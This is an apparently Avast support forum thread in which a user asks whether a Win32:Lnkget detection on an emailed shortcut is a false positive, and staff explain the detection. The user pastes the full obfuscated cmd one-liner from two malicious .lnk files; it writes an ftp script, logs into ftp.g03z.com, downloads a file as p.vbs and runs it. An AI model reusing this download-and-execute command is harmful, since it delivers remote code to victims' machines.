There are 9 out of 41 Antivirus software products reporting this email containing malware link. Other 32 consider this email clean. How to tell if it is not false positive?
Hi,
you can send this file to us using avast! warning dialog, as shown in picture below, and we will analyze that. If it is false positive we will fix it.
Hi,
it looks, that you email contains some attachement with a shortcut (file with .lnk extension), that looks like picture below (right click → Properities). See part the called “Target”. If it looks similar it’s not false positive.
There are two identical lnk shortcuts (but with different lnk names) attached in the suspected email. For your reference, I hereby copied their “Target” settings:
lnk1: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&
lnk2: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&
Are these scripts supposed to download stuff and even execute some on my system? But, my question is how to tell if these scripts will do real damage to my system, such as deleting system files, altering Windows registry, or openning a back door as a Trojan. Could my XP system be that vulnerable as to be totally controlled by such scripts? Above all, why did the other 32 Antivirus software products from VirusTotal check it and let it pass?
Hi dude2,
script in the “Target” creates script for ftp (address ftp.g03z.com) with filled in username and password and tries to download file “p” and store them as “p.vbs” in %windir% (from the shortcut properities “Start in”) and then run the “p.vbs”. But the file “p” doesn’t exist this time on then ftp server, so “p.vbs” is empty and does nothing (no real damage to your system).
Why other antivirus software products from VirusTotal check it and let it pass? I don’t know, maybe they didn’t analyze this file.
Milos, thank you for your thorough investigation on this issue.
But, here comes the hazy part of this odd problem. If a friend sends me an email with a lnk which can lead me to his well-arranged script procedure, and if I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because of some automated scripts getting executed?
Or, does there need to be any harmful signatures or patterns of the activities of the executed scripts which match Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts are manipulating the system or put users in the harm way.
If you said that the file “p” doesn’t exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of embedded scripts in lnk reference. If it is the case, to me it is more like a “access control related issue” and users need to wisely set their system so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products can not conclude this email infected simply from finding embedded scripts, but instead needing more evidence on suspected activities?
But, here comes the hazy part of this odd problem. If a friend sends me an email with a lnk which can lead me to his well-arranged script procedure, and if I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because of some automated scripts getting executed?
Yes avast! will still detect that email -- when avast! scan that .lnk file it doesn't know if the file on ftp server exists. If you don't disable avast! it doesn't allow you to run this script.
Or, does there need to be any harmful signatures or patterns of the activities of the executed scripts which match Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts are manipulating the system or put users in the harm way.
Yes.
If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of embedded scripts in lnk reference. If it is the case, to me it is more like a "access control related issue" and users need to wisely set their system so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products can not conclude this email infected simply from finding embedded scripts, but instead needing more evidence on suspected activities?
I think, that it will be hard work to analyze some script in AV engine and login to some ftp server using data gathered from analyzed scipt and check if file exist, download it and again check if it's harmful (you can see here posibility of long time processing).
If you receive some suspected email or program which you don’t trust you can run it in some virtual machine and see if it is doing some bad things – you can than return to previous state before infection.
Yes, the lnks’ targets contain scripts, but I did not see the suspected scripts are manipulating the system or put users in the harm way, simply because the file “p” doesn’t even exist on the remote FTP server during the test. If some of those VirusTotal-listed 32 antivirus software products that DID NOT SHOW POSITIVE come with the file emulation or some heuristic analysis capability and they do not find those scripts doing any harm other than trying to connect to a remote site and to download and execut unharmful stuff, then are we safe to say it is a false positive or maybe a little overcautious? Or, do you think the test results from those 32 out of 41 AV products are false negative?
If you look on the script, you can see, that there are is no direct ftp address (it is substituted during runtime) some commands are substituted same way, so what is the reason to do that? It is considered as malware practices to hide the real behavior, so others AV are false negative.
Are those scripts at most being considered as mischievous? Or, do they really manipulate the system to the extent of degrading system performance or security or put users in the harm’s way? Once that is clarified, I may concur more on the false positive or false negative conclusion.
I do not know the reason of using substituted ftp address during the runtime. But, could a legitimate script or program using the similar technique? Doesn’t Windows system itself take ftp address as an argument in its command line or FTP app environment? Again it is only my immature opinion, can we judge a script simply by its programming techniques?
Are those scripts at most being considered as mischievous?
a) If you think the script which are downloaded from ftp -- I don't remember. But the script is downloaded from strange url g03z.com (you can see owner and other properities: http://whois.domaintools.com/g03z.com or picture below).
b) If you think the script from .lnk – yes.
In case of this .lnk file, there is no reason to obfuscate the script. so It can be considered as malicious plus WHOIS informations.
Legitimate script has no reason to obfuscate the ftp address.
There is no argue that the site administrator’s identity does look suspicious based on the registration info on whois, and it is just as suspicious to have scripts embedded in lnk, especially doing ftp and downloading stuff. But, what trait makes it more than just suspicious or somewhat obfuscating but honored enough to join the Avast!iAVS/VPS still buffles me. I think a so-called malware needs to manipulate the system to the extent of degrading system performance or security or to put users in the harm’s way.
As I questioned in #11, if an embedded script was downloading unharmful stuff or even failed to download stuff because the target file on the ftp server was not there, then can we still categorize this script as Trojan Downloader, Trojan Dropper, or any type of Trojan? I am trying to understand what type of Trojan Win32:Lnkget is. If Win32:Lnkget was overcautious on suspicious downloading activities, should we count it as a false positive?
Based on Alwil’s VPS record, when Avast initially captured and categorized this as Win32:Lnkget Trojan, what was seen as the downloaded dangerous payload or downloaded malware?
Even if there was something downloaded that triggered Avast back then, but how can it still trigger Avast to generate an alarm now when there is no file to download?
Yes, we can still categorize this script as Trojan, because we don't know if the file will in the future appear on the ftp server.
Based on Alwil's VPS record, when Avast initially captured and categorized this as Win32:Lnkget Trojan, what was seen as the downloaded dangerous payload or downloaded malware?
Who knows ...
Even if there was something downloaded that triggered Avast back then, but how can it still trigger Avast to generate an alarm now when there is no file to download?
Malicious activity detection is another approach used to identify malware. In this approach, antivirus software monitors the system for suspicious program behavior. If suspicious behavior is detected, the suspect program may be further investigated, using signature based detection or another method listed in this section. This type of detection can be used to identify unknown viruses or variants on existing viruses.
<<
All referenced links pointed to the key idea:
“It takes a little more investigation to distinguish a malware from a suspicious false positive.”
Normally, this investigation will reveal the true identity of the suspicious script. From Viruslist.com, a Trojan dropper/downloader will be identified as either a dangerous payload or a malware/adware with the help of a signature or other methods. I suspect that could be the reason some 32 out of 41 AV software products would not categorize it as a Trojan downloader/dropper when this script can not be downloaded from the ftp server for further investigation.
If Alwil is not about to provide the key info with regard to what the damaging activity signature it had when Win32:Lnkget was first created, then who knows? I may have to rest my case here. Your help thus far is appreciated nonetheless.